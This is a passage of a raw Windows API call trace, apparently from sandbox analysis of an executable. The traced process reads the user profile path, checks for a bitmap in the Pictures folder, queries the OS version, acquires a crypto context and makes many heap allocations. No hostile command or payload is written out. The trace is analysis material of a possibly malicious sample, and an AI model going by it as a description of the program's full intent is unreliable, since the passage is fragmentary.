CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aASoDBkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASoDBkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SoDBkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oDBkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DBkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BkD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kD4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ug.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.564] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.564] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.564] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.564] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.564] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/5aASoDBkD4Ug.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1f7750, ftCreationTime.dwHighDateTime=0x1d5d4b5, ftLastAccessTime.dwLowDateTime=0xb3112770, ftLastAccessTime.dwHighDateTime=0x1d5cec6, ftLastWriteTime.dwLowDateTime=0xb3112770, ftLastWriteTime.dwHighDateTime=0x1d5cec6, nFileSizeHigh=0x0, nFileSizeLow=0x17ec3, dwReserved0=0x0, dwReserved1=0x0, cFileName="5aASoDBkD4Ug.bmp", cAlternateFileName="5AASOD~1.BMP")) returned 0x9e1c38 [0208.565] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0208.565] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.565] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.565] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.565] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.565] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.565] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.565] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.565] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.566] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7040, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.566] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bef0) returned 1 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0208.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0208.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.570] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0208.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.572] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0208.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.575] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.575] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 